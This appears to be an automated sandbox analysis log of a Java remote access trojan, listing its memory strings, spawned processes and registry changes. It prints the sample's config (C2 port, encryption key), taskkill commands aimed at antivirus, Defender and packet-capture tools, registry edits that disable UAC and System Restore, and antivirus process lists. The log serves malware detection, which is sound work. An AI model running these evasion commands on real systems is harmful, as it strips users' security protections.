Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Adevicename=microsoft hyper-v virtualization infrastructure driver
Source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JVM version %s (%s, %s)VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;classTrack.csignaturessignature bagDeleteWeakGlobalRefclassTrack tableloaded classesAttempting to insert duplicate classKlassNodesignatureNewWeakGlobalRefloaded classes arraycommonRef.cSetTagFreeing %d (%x)
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: xcopy.exe, 00000012.00000003.1809732405.000000000229E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VirtualMachineImpl.c
Source: java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: manufacturer=vmware, inc.
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ADeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: javaw.exe, 00000001.00000003.1746488573.000000001466C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1751960027.0000000014C6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Manufacturer=VMware, Inc.
Source: java.exe, 00000004.00000002.2948370667.0000000004981000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Bdescription=microsoft hyper-v virtualization infrastructure driver
Source: javaw.exe, 00000001.00000002.2942955746.0000000000438000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2944078896.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_6EEF2C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6EEF2C97
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_6EEF45FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_6EEF45FB
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_6EEF1244 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6EEF1244
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\cmukyspiy.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\system32\regedit.exe" /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}CS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\cmukyspiy.txt","VBOX":false,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCSh#"
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}CS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\cmukyspiy.txt","VBOX":false,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCSh
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}cc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\UK$
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}3
Source: javaw.exe, 00000001.00000002.2947521616.0000000004705000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerS
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.00000000043B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
Source: javaw.exe, 00000001.00000002.2956709894.0000000009BD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager8
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_020303C0 cpuid 1_2_020303C0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7124 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\3512 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_6EEF3DFC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 1_2_6EEF3DFC
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\regedit.exe Registry value created: PromptOnSecureDesktop 0
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: C:\Windows\SysWOW64\regedit.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore DisableSR
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EMLPROXY.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKService.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fsgk32.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKProxy.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7RTScan.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FSMA32.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ONLINENT.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SCANWSCS.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERAntiSpyware.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7FWSrvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: guardxservice.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSecurity.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7PSSrvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSASCui.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: acs.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSMngr.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BullGuard.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: virusutilities.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7EmlPxy.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamTray.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMSvc.exe
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: cscript.exe, 00000008.00000003.1767712530.0000000003233000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767176316.0000000003247000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767364953.0000000003217000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000002.1769555463.000000000324B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000002.1769445590.0000000003234000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000008.00000003.1767543395.0000000003249000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767515363.0000000003297000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767926565.000000000329A000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1769414316.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1769335671.000000000329B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1767741703.00000000032C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
